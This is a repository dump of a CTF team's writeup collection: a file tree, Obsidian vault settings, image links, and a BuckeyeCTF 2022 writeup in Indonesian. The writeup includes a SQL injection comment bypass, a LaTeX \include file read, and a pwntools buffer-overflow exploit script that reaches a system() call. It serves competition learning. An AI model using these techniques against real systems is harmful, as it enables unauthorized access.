├── 2022 ├── BuckeyeCTF 2022 │ ├── Pasted image 20221107060238.png │ ├── Pasted image 20221107060336.png │ ├── Pasted image 20221107060408.png │ ├── Pasted image 20221107060436.png │ ├── Pasted image 20221107060452.png │ ├── Pasted image 20221107060800.png │ └── README.md ├── CJCTF 2022 Final │ ├── Pasted image 20221222211919.png │ ├── Pasted image 20221222211921.png │ ├── Pasted image 20221222211953.png │ ├── Pasted image 20221222212013.png │ ├── Pasted image 20221222212045.png │ ├── Pasted image 20221222212131.png │ ├── Pasted image 20221222212154.png │ ├── Pasted image 20221222212232.png │ ├── Pasted image 20221222212243.png │ ├── Pasted image 20221222212315.png │ ├── Pasted image 20221222214414.png │ ├── Pasted image 20221222214636.png │ ├── Pasted image 20221222215806.png │ └── README.md ├── CJCTF 2022 Quals │ └── TCP1P_CJ2022.pdf ├── Compfest14-quals │ └── COMPFEST14_TCP1P.pdf ├── Cyber Apocalypse CTF 2022 - Intergalactic Chase │ └── README.md ├── Cyberwariors-Hackathon-Quals │ ├── CyberHackathon_Proof_of_Concept_Babak_Penyisihan_Santri_Anime (1).pdf │ └── READMME.md ├── DiceCTF │ ├── crypto │ │ ├── kfb │ │ │ ├── flag.txt │ │ │ ├── server.py │ │ │ └── solve.py │ │ ├── obp │ │ │ ├── obp.output.txt │ │ │ └── solve.py │ │ └── pem │ │ │ ├── encrypted.bin │ │ │ ├── flag.txt │ │ │ ├── generate.py │ │ │ ├── privatekey.pem │ │ │ └── solve.py │ ├── rev │ │ ├── check │ │ │ ├── .gdb_history │ │ │ ├── challenge │ │ │ └── solve.py │ │ ├── slices │ │ │ └── solve.py │ │ └── super anti scalper solution │ │ │ └── solve.html │ └── web │ │ ├── inspect-me │ │ ├── README.md │ │ └── inspect-me.mc.ax.html │ │ ├── pastebin │ │ └── README.md │ │ ├── point │ │ ├── point.ipynb │ │ ├── point.main.go │ │ └── solve.py │ │ └── reverser │ │ ├── reverser.app.py │ │ └── solve.py ├── DownUnderCTF 2022 │ ├── Pasted image 20220925192012.png │ ├── Pasted image 20220925192200.png │ ├── Pasted image 20220925192221.png │ ├── Pasted image 20220925192245.png │ ├── Pasted image 20220925192305.png │ ├── Pasted image 20220925192349.png │ ├── Pasted image 20220925192359.png │ ├── Pasted image 20220925192410.png │ ├── Pasted image 20220925192451.png │ ├── Pasted image 20220925192503.png │ ├── Pasted image 20220925192528.png │ ├── Pasted image 20220925192546.png │ ├── Pasted image 20220925192621.png │ ├── Pasted image 20220925192703.png │ ├── Pasted image 20220925192712.png │ ├── Pasted image 20220925192904.png │ ├── Pasted image 20220925192923.png │ ├── Pasted image 20220925193009.png │ ├── Pasted image 20220925193231.png │ ├── Pasted image 20220925193444.png │ ├── Pasted image 20220925193527.png │ └── README.md ├── GoolgeCTF2022 │ └── README.md ├── MapleCTF 2022 │ ├── crypto │ │ └── brsaby │ │ │ ├── script.py │ │ │ └── solve.ipynb │ ├── pwn │ │ ├── README.md │ │ ├── terminal.png │ │ └── warmup1 │ │ │ ├── chal │ │ │ ├── flag.txt │ │ │ └── solve.py │ └── web │ │ ├── Bookstore │ │ ├── Solve.py │ │ └── bookstore.zip │ │ ├── Pickle Factory │ │ ├── pickle-factory.zip │ │ └── solve.py │ │ └── honksay │ │ ├── a.out │ │ ├── honksay.tar.gz │ │ ├── hosted │ │ ├── ._Dockerfile │ │ ├── ._app.js │ │ ├── ._goose.js │ │ ├── ._package-lock.json │ │ ├── ._package.json │ │ ├── ._public │ │ ├── Dockerfile │ │ ├── app.js │ │ ├── build.sh │ │ ├── goose.js │ │ ├── package-lock.json │ │ ├── package.json │ │ └── public │ │ │ ├── ._images │ │ │ └── images │ │ │ ├── ._goosevie.png │ │ │ └── goosevie.png │ │ └── solve.md ├── NCW2022 │ └── WU_NCW22_Anya Haha Inakute Sabishii.pdf ├── SECCON CTF 2022 Quals │ ├── Pasted image 20221113195707.png │ ├── Pasted image 20221113195729.png │ ├── Pasted image 20221113195754.png │ └── README.md ├── TCP1P-CTF-Bootcamp │ └── PWN │ │ ├── Pasted image 20221231091251.png │ │ └── README.md ├── annofest-2022 │ └── Penyisihan │ │ └── README.md ├── corCTF 2022 │ ├── babypwn │ │ ├── babypwn │ │ ├── get_libc.py │ │ ├── main │ │ │ ├── Dockerfile │ │ │ ├── babypwn │ │ │ ├── flag.txt │ │ │ ├── libc.so.6 │ │ │ └── run.sh │ │ └── solve.py │ └── whack-a-frog │ │ ├── solve.py │ │ ├── test │ │ └── whacking-the-froggers.pcap ├── csawctf-qual-2022 │ ├── Pasted image 20220912170611.png │ ├── Pasted image 20220912170634.png │ ├── Pasted image 20220912170647.png │ ├── Pasted image 20220912170726.png │ ├── Pasted image 20220912170742.png │ ├── Pasted image 20220912171239.png │ ├── Pasted image 20220912171311.png │ └── README.md ├── ctf.nullcon.net │ ├── Cloud 9*9 │ │ ├── README.md │ │ ├── access.py │ │ ├── flag4.txt │ │ ├── rce.py │ │ └── set.env.sh │ ├── Git To the Core │ │ ├── README.md │ │ ├── connect.py │ │ └── task.py │ ├── Unis Love Code │ │ ├── chall.py │ │ └── test.py │ └── jsonify │ │ ├── flag.txt │ │ ├── index.php │ │ ├── test.php │ │ └── test2.php ├── ctf.thefewchosen.com │ └── README.md ├── deadface-ctf │ ├── Pasted image 20221016084856.png │ ├── Pasted image 20221016084906.png │ ├── Pasted image 20221016084928.png │ ├── Pasted image 20221016085136.png │ ├── Pasted image 20221016085148.png │ ├── Pasted image 20221016085202.png │ ├── Pasted image 20221016085210.png │ ├── Pasted image 20221016085502.png │ ├── Pasted image 20221016085646.png │ ├── Pasted image 20221016090134.png │ ├── Pasted image 20221016090147.png │ ├── Pasted image 20221016090154.png │ ├── Pasted image 20221016090238.png │ ├── Pasted image 20221016090243.png │ ├── Pasted image 20221016090323.png │ └── README.md ├── gdg-algiers-ctf │ ├── Pasted image 20221010110356.png │ ├── Pasted image 20221010110402.png │ ├── Pasted image 20221010110408.png │ ├── Pasted image 20221010110505.png │ ├── Pasted image 20221010110510.png │ ├── Pasted image 20221010110604.png │ ├── Pasted image 20221010110608.png │ ├── Pasted image 20221010110728.png │ ├── Pasted image 20221010111105.png │ └── README.md ├── glacierctf-2022 │ ├── Pasted image 20221127092045.png │ ├── Pasted image 20221127092101.png │ ├── Pasted image 20221127092221.png │ ├── Pasted image 20221127092240.png │ ├── Pasted image 20221127092353.png │ ├── Pasted image 20221127093038.png │ ├── Pasted image 20221127093304.png │ ├── Pasted image 20221127093345.png │ └── README.md ├── jade-ctf │ ├── Pasted image 20221023144928.png │ ├── Pasted image 20221023145014.png │ ├── Pasted image 20221023145032.png │ ├── Pasted image 20221023145105.png │ ├── Pasted image 20221023153937.png │ ├── Pasted image 20221023154016.png │ ├── Pasted image 20221023154059.png │ ├── Pasted image 20221023154120.png │ ├── Pasted image 20221023154451.png │ ├── Pasted image 20221023154508.png │ ├── Pasted image 20221023154544.png │ ├── Pasted image 20221023154728.png │ ├── Pasted image 20221023154928.png │ ├── Pasted image 20221023154942.png │ ├── Pasted image 20221023155120.png │ ├── Pasted image 20221023155211.png │ ├── Pasted image 20221023155218.png │ └── README.md ├── kitctfctf-2022 │ ├── Pasted image 20221211192759.png │ ├── Pasted image 20221211192912.png │ ├── Pasted image 20221211192926.png │ ├── Pasted image 20221211192941.png │ ├── Pasted image 20221211192953.png │ ├── Pasted image 20221211193146.png │ ├── Pasted image 20221211193234.png │ └── README.md ├── sekai-ctf │ ├── Pasted image 20221004173301.png │ ├── Pasted image 20221004173340.png │ └── README.md ├── square-ctf-2022 │ ├── Pasted image 20221121074934.png │ ├── Pasted image 20221121074939.png │ ├── Pasted image 20221121075018.png │ ├── Pasted image 20221121075102.png │ └── README.md ├── tangerang CTF │ ├── Pasted image 20220319104150.png │ ├── Pasted image 20220319174935.png │ ├── Pasted image 20220319174951.png │ ├── Pasted image 20220319180942.png │ ├── Pasted image 20220319194044.png │ ├── Pasted image 20220319194544.png │ ├── Pasted image 20220320063212.png │ ├── Pasted image 20220320065410.png │ ├── Pasted image 20220320102408.png │ ├── Pasted image 20220320103533.png │ └── README.md ├── web1.hsctf.com │ └── README.md └── x-mas-ctf-2022 │ ├── Pasted image 20221222205054.png │ ├── Pasted image 20221222205402.png │ ├── Pasted image 20221222205507.png │ ├── Pasted image 20221222205718.png │ ├── Pasted image 20221222205819.png │ ├── Pasted image 20221222205926.png │ ├── Pasted image 20221222210046.png │ ├── Pasted image 20221222210140.png │ ├── Pasted image 20221222210201.png │ ├── Pasted image 20221222210316.png │ ├── Pasted image 20221222210324.png │ ├── Pasted image 20221223211635.png │ ├── Pasted image 20221223211710.png │ ├── Pasted image 20221223211742.png │ ├── Pasted image 20221223211801.png │ ├── Pasted image 20221223212147.png │ ├── Pasted image 20221223212155.png │ └── README.md ├── 2023 ├── 0xL4ughCTF 2023 │ └── README.md ├── ARACTF2023 │ └── README.md ├── BucketCtf 2023 │ └── README.md ├── ByuCtf-2023 │ └── README.md ├── Cursedctf-2023 │ └── README.md ├── DiceCTF-2023 │ ├── Pasted image 20230207164229.png │ ├── Pasted image 20230207164413.png │ ├── Pasted image 20230207164435.png │ └── README.md ├── HTB Cyber Apocalypse 2023 │ ├── Pasted image 20230324115213.png │ └── README.md ├── HackTMCTF-quals │ └── README.md ├── IdekCTF-2022 │ ├── Pasted image 20230116231049.png │ ├── Pasted image 20230116231114.png │ ├── Pasted image 20230116231338.png │ └── README.md ├── Joints Quals 2023 │ └── README.md ├── KalmarCTF-2023 │ └── README.md ├── Knightctf-2023 │ ├── Pasted image 20230122064030.png │ ├── Pasted image 20230122064152.png │ ├── Pasted image 20230122064305.png │ ├── Pasted image 20230122064318.png │ ├── Pasted image 20230122064420.png │ ├── Pasted image 20230122064435.png │ ├── Pasted image 20230122064452.png │ ├── Pasted image 20230122064534.png │ ├── Pasted image 20230122064618.png │ ├── Pasted image 20230122064721.png │ ├── Pasted image 20230122064755.png │ ├── Pasted image 20230122064820.png │ ├── Pasted image 20230122064919.png │ └── README.md ├── LACTF-2023 │ ├── Pasted image 20230214115929.png │ └── README.md ├── LineCTF 2023 │ └── README.md ├── Pragyan CTF 2023 │ └── README.md ├── Real-World-CTF │ ├── Pasted image 20230109172555.png │ └── README.md ├── RushCTF 2023 │ └── README.md ├── San-diego-ctf-2023 │ └── README.md ├── UMASSCTF 2023 │ └── README.md ├── UTCTF 2023 │ └── README.md ├── VU-Cyberthon-2023 │ └── README.md ├── WaniCtf 2023 │ └── README.md ├── Wrectit Quals 2023 │ └── README.md ├── angstromctf-2023 │ └── README.md ├── bbctf-2023 │ ├── Pasted image 20230206061956.png │ ├── Pasted image 20230206062058.png │ ├── Pasted image 20230206062127.png │ ├── Pasted image 20230206062218.png │ └── README.md ├── ctf-after-dark-winter-2023 │ └── README.md ├── damctf-2023 │ └── README.md ├── deadsec-ctf-2023 │ └── README.md ├── gray-cat-the-flag-2023-qualifier │ └── README.md ├── hackpack-ctf-2023 │ └── README.md ├── m0leConCTF-2023 │ └── README.md ├── nullcon HackIM CTF Berlin │ └── README.md ├── plaidCTF 2023 │ └── README.md ├── umdctf-2023 │ └── README.md └── wolvctf-2023 │ ├── Pasted image 20230323041112.png │ ├── Pasted image 20230323041128.png │ └── README.md ├── .obsidian ├── app.json ├── appearance.json ├── community-plugins.json ├── core-plugins-migration.json ├── core-plugins.json ├── graph.json ├── hotkeys.json ├── plugins │ ├── obsidian-dynamic-toc │ │ ├── main.js │ │ ├── manifest.json │ │ └── styles.css │ ├── obsidian-git │ │ ├── data.json │ │ ├── main.js │ │ ├── manifest.json │ │ └── styles.css │ └── obsidian-imgur-plugin │ │ ├── data.json │ │ ├── main.js │ │ └── manifest.json └── workspace.json └── README.md /.obsidian/app.json: -------------------------------------------------------------------------------- 1 | { 2 | "attachmentFolderPath": "./", 3 | "newLinkFormat": "relative", 4 | "useMarkdownLinks": true, 5 | "pdfExportSettings": { 6 | "pageSize": "Letter", 7 | "landscape": false, 8 | "margin": "0", 9 | "downscalePercent": 100 10 | } 11 | } -------------------------------------------------------------------------------- /.obsidian/appearance.json: -------------------------------------------------------------------------------- 1 | { 2 | "accentColor": "", 3 | "baseFontSize": 15 4 | } -------------------------------------------------------------------------------- /.obsidian/community-plugins.json: -------------------------------------------------------------------------------- 1 | [ 2 | "obsidian-dynamic-toc", 3 | "obsidian-git", 4 | "obsidian-imgur-plugin" 5 | ] -------------------------------------------------------------------------------- /.obsidian/core-plugins-migration.json: -------------------------------------------------------------------------------- 1 | { 2 | "file-explorer": true, 3 | "global-search": true, 4 | "switcher": true, 5 | "graph": true, 6 | "backlink": true, 7 | "outgoing-link": true, 8 | "tag-pane": true, 9 | "page-preview": true, 10 | "daily-notes": true, 11 | "templates": true, 12 | "note-composer": true, 13 | "command-palette": true, 14 | "slash-command": false, 15 | "editor-status": true, 16 | "starred": true, 17 | "markdown-importer": false, 18 | "zk-prefixer": false, 19 | "random-note": false, 20 | "outline": true, 21 | "word-count": true, 22 | "slides": false, 23 | "audio-recorder": false, 24 | "workspaces": false, 25 | "file-recovery": true, 26 | "publish": false, 27 | "sync": false, 28 | "canvas": true, 29 | "bookmarks": true 30 | } -------------------------------------------------------------------------------- /.obsidian/core-plugins.json: -------------------------------------------------------------------------------- 1 | [ 2 | "file-explorer", 3 | "global-search", 4 | "switcher", 5 | "graph", 6 | "backlink", 7 | "canvas", 8 | "outgoing-link", 9 | "tag-pane", 10 | "page-preview", 11 | "daily-notes", 12 | "templates", 13 | "note-composer", 14 | "command-palette", 15 | "editor-status", 16 | "bookmarks", 17 | "outline", 18 | "word-count", 19 | "file-recovery" 20 | ] -------------------------------------------------------------------------------- /.obsidian/graph.json: -------------------------------------------------------------------------------- 1 | { 2 | "collapse-filter": true, 3 | "search": "", 4 | "showTags": false, 5 | "showAttachments": false, 6 | "hideUnresolved": false, 7 | "showOrphans": true, 8 | "collapse-color-groups": true, 9 | "colorGroups": [], 10 | "collapse-display": true, 11 | "showArrow": false, 12 | "textFadeMultiplier": 0, 13 | "nodeSizeMultiplier": 1, 14 | "lineSizeMultiplier": 1, 15 | "collapse-forces": true, 16 | "centerStrength": 0.518713248970312, 17 | "repelStrength": 10, 18 | "linkStrength": 1, 19 | "linkDistance": 250, 20 | "scale": 0.6283605869744029, 21 | "close": false 22 | } -------------------------------------------------------------------------------- /.obsidian/hotkeys.json: -------------------------------------------------------------------------------- 1 | { 2 | "obsidian-dynamic-toc:dynamic-toc-insert-command": [ 3 | { 4 | "modifiers": [ 5 | "Mod" 6 | ], 7 | "key": "." 8 | } 9 | ], 10 | "obsidian-plugin-toc:create-toc-next-level": [], 11 | "obsidian-plugin-toc:create-toc": [ 12 | { 13 | "modifiers": [ 14 | "Mod" 15 | ], 16 | "key": "." 17 | } 18 | ] 19 | } -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-dynamic-toc/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "obsidian-dynamic-toc", 3 | "name": "Dynamic Table of Contents", 4 | "author": "aidurber", 5 | "description": "An Obsidian plugin to generate Tables of Contents that stay up to date with your document outline.", 6 | "minAppVersion": "0.11.0", 7 | "version": "0.0.27", 8 | "repo": "aidurber/obsidian-plugin-dynamic-toc" 9 | } 10 | -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-dynamic-toc/styles.css: -------------------------------------------------------------------------------- 1 | .is-live-preview .dynamic-toc>*{margin-top:0;margin-bottom:0}.is-live-preview .dynamic-toc>* br{display:none}.is-live-preview .dynamic-toc>*:first-child{margin-top:16px}.is-live-preview .dynamic-toc>*:last-child{margin-bottom:16px}.is-live-preview .dynamic-toc ul{white-space:normal}.is-live-preview .dynamic-toc ol{white-space:normal} 2 | -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-git/data.json: -------------------------------------------------------------------------------- 1 | { 2 | "commitMessage": "vault backup: {{date}}", 3 | "commitDateFormat": "YYYY-MM-DD HH:mm:ss", 4 | "autoSaveInterval": 0, 5 | "autoPushInterval": 0, 6 | "autoPullInterval": 0, 7 | "autoPullOnBoot": false, 8 | "disablePush": false, 9 | "pullBeforePush": true, 10 | "disablePopups": false, 11 | "listChangedFilesInMessageBody": false, 12 | "showStatusBar": true, 13 | "updateSubmodules": false, 14 | "syncMethod": "merge", 15 | "customMessageOnAutoBackup": false, 16 | "autoBackupAfterFileChange": false, 17 | "treeStructure": false, 18 | "refreshSourceControl": true, 19 | "basePath": "", 20 | "differentIntervalCommitAndPush": false, 21 | "changedFilesInStatusBar": false, 22 | "showedMobileNotice": true, 23 | "refreshSourceControlTimer": 7000, 24 | "showBranchStatusBar": true, 25 | "setLastSaveToLastCommit": false, 26 | "submoduleRecurseCheckout": false, 27 | "gitDir": "", 28 | "showFileMenu": true, 29 | "autoCommitMessage": "vault backup: {{date}}" 30 | } -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-git/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "obsidian-git", 3 | "name": "Obsidian Git", 4 | "description": "Backup your vault with Git.", 5 | "isDesktopOnly": false, 6 | "fundingUrl": "https://ko-fi.com/vinzent", 7 | "js": "main.js", 8 | "version": "2.19.1" 9 | } 10 | -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-imgur-plugin/data.json: -------------------------------------------------------------------------------- 1 | { 2 | "uploadStrategy": "ANONYMOUS_IMGUR", 3 | "clientId": null, 4 | "showRemoteUploadConfirmation": false 5 | } -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-imgur-plugin/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "obsidian-imgur-plugin", 3 | "name": "Imgur Plugin", 4 | "version": "2.2.1", 5 | "minAppVersion": "0.13.19", 6 | "description": "This plugin uploads images from your clipboard to imgur.com and embeds uploaded image to your note", 7 | "author": "Kirill Gavrilov", 8 | "authorUrl": "https://github.com/gavvvr", 9 | "isDesktopOnly": true 10 | } 11 | -------------------------------------------------------------------------------- /.obsidian/workspace.json: -------------------------------------------------------------------------------- 1 | { 2 | "main": { 3 | "id": "4c0409ed7591ba4c", 4 | "type": "split", 5 | "children": [ 6 | { 7 | "id": "294506181e74d78a", 8 | "type": "tabs", 9 | "children": [ 10 | { 11 | "id": "ea1298c9a2b7937d", 12 | "type": "leaf", 13 | "state": { 14 | "type": "markdown", 15 | "state": { 16 | "file": "2023/ByuCtf-2023/README.md", 17 | "mode": "source", 18 | "source": false 19 | } 20 | } 21 | }, 22 | { 23 | "id": "825932db43b069b6", 24 | "type": "leaf", 25 | "state": { 26 | "type": "markdown", 27 | "state": { 28 | "file": "README.md", 29 | "mode": "source", 30 | "source": false 31 | } 32 | } 33 | } 34 | ] 35 | } 36 | ], 37 | "direction": "vertical" 38 | }, 39 | "left": { 40 | "id": "4804650776430b5c", 41 | "type": "split", 42 | "children": [ 43 | { 44 | "id": "0e2ea75063aedbc8", 45 | "type": "tabs", 46 | "children": [ 47 | { 48 | "id": "dda2f2ac5d697884", 49 | "type": "leaf", 50 | "state": { 51 | "type": "file-explorer", 52 | "state": { 53 | "sortOrder": "alphabetical" 54 | } 55 | } 56 | }, 57 | { 58 | "id": "cea1a1732bbd4758", 59 | "type": "leaf", 60 | "state": { 61 | "type": "search", 62 | "state": { 63 | "query": "", 64 | "matchingCase": false, 65 | "explainSearch": false, 66 | "collapseAll": false, 67 | "extraContext": false, 68 | "sortOrder": "alphabetical" 69 | } 70 | } 71 | }, 72 | { 73 | "id": "09aefc050bc2aa5a", 74 | "type": "leaf", 75 | "state": { 76 | "type": "starred", 77 | "state": {} 78 | } 79 | }, 80 | { 81 | "id": "4c3ed564f8b8a6db", 82 | "type": "leaf", 83 | "state": { 84 | "type": "bookmarks", 85 | "state": {} 86 | } 87 | } 88 | ] 89 | } 90 | ], 91 | "direction": "horizontal", 92 | "width": 300 93 | }, 94 | "right": { 95 | "id": "6b6ce11dc9cf1f82", 96 | "type": "split", 97 | "children": [ 98 | { 99 | "id": "c90deb156513a322", 100 | "type": "tabs", 101 | "children": [ 102 | { 103 | "id": "8b420389797f3889", 104 | "type": "leaf", 105 | "state": { 106 | "type": "backlink", 107 | "state": { 108 | "file": "2023/ByuCtf-2023/README.md", 109 | "collapseAll": false, 110 | "extraContext": false, 111 | "sortOrder": "alphabetical", 112 | "showSearch": false, 113 | "searchQuery": "", 114 | "backlinkCollapsed": false, 115 | "unlinkedCollapsed": true 116 | } 117 | } 118 | }, 119 | { 120 | "id": "427d1310fb19206a", 121 | "type": "leaf", 122 | "state": { 123 | "type": "outgoing-link", 124 | "state": { 125 | "file": "2023/ByuCtf-2023/README.md", 126 | "linksCollapsed": false, 127 | "unlinkedCollapsed": true 128 | } 129 | } 130 | }, 131 | { 132 | "id": "6d3b8cc745d5a2cc", 133 | "type": "leaf", 134 | "state": { 135 | "type": "tag", 136 | "state": { 137 | "sortOrder": "frequency", 138 | "useHierarchy": true 139 | } 140 | } 141 | }, 142 | { 143 | "id": "390839dfd0d0fbff", 144 | "type": "leaf", 145 | "state": { 146 | "type": "outline", 147 | "state": { 148 | "file": "2023/ByuCtf-2023/README.md" 149 | } 150 | } 151 | } 152 | ], 153 | "currentTab": 3 154 | } 155 | ], 156 | "direction": "horizontal", 157 | "width": 300 158 | }, 159 | "left-ribbon": { 160 | "hiddenItems": { 161 | "switcher:Open quick switcher": false, 162 | "graph:Open graph view": false, 163 | "canvas:Create new canvas": false, 164 | "daily-notes:Open today's daily note": false, 165 | "templates:Insert template": false, 166 | "command-palette:Open command palette": false 167 | } 168 | }, 169 | "active": "ea1298c9a2b7937d", 170 | "lastOpenFiles": [ 171 | "2023/deadsec-ctf-2023/README.md", 172 | "2023/ByuCtf-2023/README.md", 173 | "2023/ByuCtf-2023", 174 | "2023/gray-cat-the-flag-2023-qualifier/README.md", 175 | "2023/Untitled.md", 176 | "2023/deadsec-ctf-2023", 177 | "README.md", 178 | "2023/gray-cat-the-flag-2023-qualifier", 179 | "2023/m0leConCTF-2023/README.md", 180 | "2023/angstromctf-2023/README.md", 181 | "2023/m0leConCTF-2023", 182 | "some.md", 183 | "2023/San-diego-ctf-2023/README.md", 184 | "2023/San-diego-ctf-2023", 185 | "2023/WaniCtf 2023/README.md", 186 | "2023/WaniCtf 2023", 187 | "2023/umdctf-2023/README.md", 188 | "2023/umdctf-2023", 189 | "2023/hackpack-ctf-2023/README.md", 190 | "().md", 191 | "tmp.md", 192 | "Untitled.canvas", 193 | "Untitled", 194 | "2023/angstromctf-2023", 195 | "2023/plaidCTF 2023/README.md", 196 | "2023/plaidCTF 2023", 197 | "2023/Joints Quals 2023/README.md", 198 | "2023/LineCTF 2023/README.md", 199 | "2023/Wrectit Quals 2023/README.md", 200 | "2023/damctf-2023/README.md", 201 | "2023/BucketCtf 2023/README.md", 202 | "2023/Cursedctf-2023/README.md", 203 | "2023/wolvctf-2023/README.md", 204 | "2023/HTB Cyber Apocalypse 2023/README.md", 205 | "2023/UMASSCTF 2023/README.md", 206 | "2023/UMASC.md", 207 | "2023/HTB Cyber Apocalypse 2023/Pasted image 20230324115213.png", 208 | "2023/nullcon HackIM CTF Berlin/README.md", 209 | "2023/wolvctf-2023/Pasted image 20230323041128.png", 210 | "2023/wolvctf-2023/Pasted image 20230323041112.png", 211 | "2023/bbctf-2023/Pasted image 20230206062127.png", 212 | "2023/bbctf-2023/Pasted image 20230206062215.png", 213 | "2023/bbctf-2023/Pasted image 20230206062218.png" 214 | ] 215 | } -------------------------------------------------------------------------------- /2022/BuckeyeCTF 2022/Pasted image 20221107060238.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/BuckeyeCTF 2022/Pasted image 20221107060238.png -------------------------------------------------------------------------------- /2022/BuckeyeCTF 2022/Pasted image 20221107060336.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/BuckeyeCTF 2022/Pasted image 20221107060336.png -------------------------------------------------------------------------------- /2022/BuckeyeCTF 2022/Pasted image 20221107060408.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/BuckeyeCTF 2022/Pasted image 20221107060408.png -------------------------------------------------------------------------------- /2022/BuckeyeCTF 2022/Pasted image 20221107060436.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/BuckeyeCTF 2022/Pasted image 20221107060436.png -------------------------------------------------------------------------------- /2022/BuckeyeCTF 2022/Pasted image 20221107060452.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/BuckeyeCTF 2022/Pasted image 20221107060452.png -------------------------------------------------------------------------------- /2022/BuckeyeCTF 2022/Pasted image 20221107060800.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/BuckeyeCTF 2022/Pasted image 20221107060800.png -------------------------------------------------------------------------------- /2022/BuckeyeCTF 2022/README.md: -------------------------------------------------------------------------------- 1 | # web 2 | --- 3 | ## Scanbook 4 | 5 | pada website ini kita diberikan url website, dimana website ini merupakan sebuah web app, untuk menyimpan note dan menyimpan datanya menggunakan qrcode. Jadi kita hanya perlu menggenerate qrcode dengan angka 0, di cyberchef https://gchq.github.io/CyberChef/#recipe=Generate_QR_Code(%27PNG%27,5,2,%27Medium%27)&input=MA, dan upload ke website tersebut. Yay kita mendaptkan flagnya 6 | 7 |  8 | 9 | ## buckeyenotes 10 | 11 | kita diberikan website yang vulnerable dengan sql injection, dan kita disuruh untuk mengambil note dari spesifik user 12 | 13 |  14 | 15 | cukup kita bypass menggunakan "brutusB3stNut9999'--" 16 | 17 | bypass menggunakan comment pada sql 18 | 19 | ## textual 20 | 21 | diketahui flag ada di current directory server, karna app ini menggunakan latex dan di latex ada fungsi untuk menambah latex lain menggunakan fungsi `\include`, kita bisa memanfaatkannya untuk membaca flag di current directory. 22 | 23 |  24 | 25 | ## pong 26 | 27 | Didalam challenge kita diberikan url yang menuju website yang berisi game ping pong didalamnya. 28 | 29 |  30 | 31 | Dalam challenge ini tujuan kita adalah untuk mengalahkan lawan kita. Setelah melihat source code menggunakan developer tools, kita mengetahui bahwa proses game ini dilakukan pada client, sihingga kita bisa mengubah beberapa parameter dalam game. 32 | Untuk source code index, bisa kalian lihat disini: https://pastebin.com/vKbP48ZR 33 | 34 | Jadi untuk menyelesaikan challenge ini saya merubah parameter bvx menjadi 100, agar bola masuk ke gawang lawan, dan kita bisa memenangkan game ini. 35 | 36 |  37 | 38 | kita continue dari breakpoint, dan boom, kita mendapatkan flagnya 39 | 40 |  41 | 42 | # pwn 43 | --- 44 | ## Samurai 45 | 46 | Kita diberikan source code, dimana kita perlu mencocokkan variable outcome dengan hex 0x4774cc, untuk mendapatkan shell. 47 | 48 | ```c 49 | if(outcome == 0x4774cc) { 50 | char* finisher = malloc(8); 51 | scroll(txt[3]); 52 | fgets(finisher, 8, stdin); 53 | system(finisher); 54 | } 55 | ``` 56 | 57 | exploit 58 | 59 | ```python 60 | from pwn import * 61 | import sys 62 | from Crypto.Util.number import long_to_bytes 63 | 64 | context.binary = exe = ELF(f"./samurai", checksec=False) 65 | context.terminal = "konsole -e".split() 66 | context.log_level = "INFO" 67 | context.bits = 64 68 | context.arch = "amd64" 69 | 70 | 71 | def init(): 72 | if args.RMT: 73 | p = remote(sys.argv[1], sys.argv[2]) 74 | else: 75 | p = process() 76 | return Exploit(p), p 77 | 78 | 79 | class Exploit: 80 | def __init__(self, p: process): 81 | self.p = p 82 | 83 | def debug(self, script=None): 84 | if not args.RMT: 85 | if script: 86 | attach(self.p, script) 87 | else: 88 | attach(self.p) 89 | 90 | def sendName(self, content): 91 | p = self.p 92 | p.sendline(content) 93 | 94 | def waitForName(self): 95 | p = self.p 96 | p.recvuntil(b"what was it again?") 97 | 98 | def main(): 99 | x, p = init() 100 | """ 101 | karna pada source code ada baris seperti dibawah ini: 102 | 103 | strcpy(response + strlen(response) - 1, ".\n"); 104 | 105 | kita harus membuat null-byte di awal, agar address yang ingin kita rubah, 106 | tidak ter-overwrite dengan newline. 107 | """ 108 | pay = b"\x00"+b"A"*29 109 | pay += b"\xcc\x74\x47\x00" 110 | pay +=b"A"*2 111 | x.sendName(pay) 112 | x.debug("break *main+203\nc") 113 | x.waitForName() 114 | """ 115 | 116 | char* finisher = malloc(8); 117 | 118 | kita hanya bisa mengirim sebanyak 8 byte, 119 | jadi kita menggunakan asterisk "*" untuk membaca flagnya 120 | """ 121 | p.sendline(b"cat f*") 122 | p.interactive() 123 | 124 | if __name__=="__main__": 125 | main() 126 | ``` 127 | 128 | -------------------------------------------------------------------------------- /2022/CJCTF 2022 Final/Pasted image 20221222211919.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222211919.png -------------------------------------------------------------------------------- /2022/CJCTF 2022 Final/Pasted image 20221222211921.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222211921.png -------------------------------------------------------------------------------- /2022/CJCTF 2022 Final/Pasted image 20221222211953.png: -------------------------------------------------------------------------------- 